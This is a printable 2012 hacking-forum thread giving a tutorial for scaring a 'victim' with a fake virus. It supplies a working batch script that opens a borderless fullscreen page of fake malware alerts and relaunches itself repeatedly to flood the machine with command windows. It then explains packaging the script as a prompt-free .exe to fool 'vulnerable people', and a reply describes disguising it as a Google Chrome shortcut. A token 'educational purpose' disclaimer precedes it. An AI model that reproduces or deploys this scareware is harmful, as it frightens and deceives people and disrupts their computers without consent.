![]() |
|
[TuT] How to scare your victim with a fake virus - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: [TuT] How to scare your victim with a fake virus (/Thread-TuT-How-to-scare-your-victim-with-a-fake-virus) |
[TuT] How to scare your victim with a fake virus - Quentin™ - 04-21-2012 How to scare your victim with a fake virus Agreement Clause Ok, I have no intention on telling you to go and do this to someone you don't like, or try to go and scare someone. I made this for educational purpose. I have no part in the activity that you or anyone else who tries this. Use at your own risk. Accept - Read On Decline - Leave this thread immediately. Ok lets get started. One thing you should know, alt + f4 equals program is close for anything. If the victim trys to alt+f4 this program, it will spam him with cmd applications. So first open up notepad Paste this in your notepad @echo off echo ^<html^>^<head^>^<title^>{Troll}You've been hacked by Local Injection^</title^> > Troll.hta echo. >> Troll.hta echo ^<hta:application id="oBVC" >> Troll.hta echo applicationname="Troll" >> Troll.hta echo version="1.0" >> Troll.hta echo maximizebutton="no" >> Troll.hta echo minimizebutton="no" >> Troll.hta echo sysmenu="no" >> Troll.hta echo Caption="no" >> Troll.hta echo windowstate="maximize"/^> >> Troll.hta echo. >> Troll.hta echo ^</head^>^<body background="http://fc07.deviantart.net/fs10/i/2006/106/4/d/red_matrix_by_bboisupafly.jpg" scroll="yes"^> >> Troll.hta echo ^<img src="http://www.bleepstatic.com/swr-guides/d/defense-center/virus-threat-detected.png" ^> >> Troll.hta echo ^<img src="http://trojan-killer.net/wp-content/uploads/Windows-7-Recovery-scam-600x377.png" ^> >> Troll.hta echo ^<img src="http://1.bp.blogspot.com/-1SzjvypgN20/TpJUYcDEf5I/AAAAAAAAA5E/_I0aJlvPOzU/s1600/windows+7+Detect+virus.png" ^> >> Troll.hta echo ^<img src="http://http://t5ak.roblox.com/6f88d4303ff49a12e48138e3ecdaaed3" ^> >> Troll.hta echo ^<img src="http://3.bp.blogspot.com/_yucea152xUE/TQyfyQwYijI/AAAAAAAAAOU/GDfoUYhWcM8/s1600/Malware+Detected.jpg" ^> >> Troll.hta echo ^<img src="http://i29.photobucket.com/albums/c259/Chad711/malwaremouse.jpg" ^> >> Troll.hta echo ^</body^>^</html^> >> Troll.hta start "" /wait "Troll.hta" del /s /f /q "Troll.hta" > nul start start start start start start start start Fun.bat Now go up to file, then click save as, (Make Sure Its Set To Set To All Files) then type in fun.bat and save it to your desktop. If you think your victim will be scared to click a .bat file, learn my tutorial on how to convert a .bat file into a .exe look down below Conversion Now we are going to convert the .bat file into a .exe file. Some people know that when they see a .bat file they know something is up so we are going to convert it into a .exe, it gets more vulnerable people. Open your start menu. Windows 7/Vista - Type in iexpress.exe, then press enter Windows XP - Click Run, then type in iexpress.exe Next, it should say Welcome to IExpress 2.0. Click Next You should see "Package Purpose", click next Now you should see "Packaging Title", Type in title of your program there then click next Now you should see "Confirmation Prompt", this is what the victim will see, if they want to continue with running the program. You can click "No Prompt" for not warning them or "Prompt user with" if you want to warn them, then click next. Skip the "License Agreement" part For "Packaged Files" click Add and find your .bat file and click Next. Now you should see "Install Program to Launch", where it says "Install Program" click the dropdown arrow and find the .bat program and click it. Now click Next Skip "Show Windows" part For "Finished Message" its optional. Then click Next. Now you should see "Package Name and Options", click Browse and save it anywhere on your computer, then click Next. Now you should see "Configure Restart" make sure its on the No Restart option then click Next. Skip the "Save Self Extraction Directive" part. Now your at "Create Package" Click next and wait for it to finish loading, then click Finish. Now, +Rep If You Like This Tutorial. RE: [TuT] How to scare your victim with a fake virus - Reverence - 04-21-2012 LOL. I remember when I used to do this when I first started batch coding. Good times. RE: [TuT] How to scare your victim with a fake virus - AqworldThunder - 04-21-2012 Lol, batch files anyways a better way to make someone click on your batch file is to make a shortcut and change the icon so say I get on Google Chrome often, you remove original google chrome right click make a new shortcut and click google chrome.bat (Make sure it isn't fun.bat change to Google Chrome.bat) then get the google chrome icon and put in same spot. Simple
|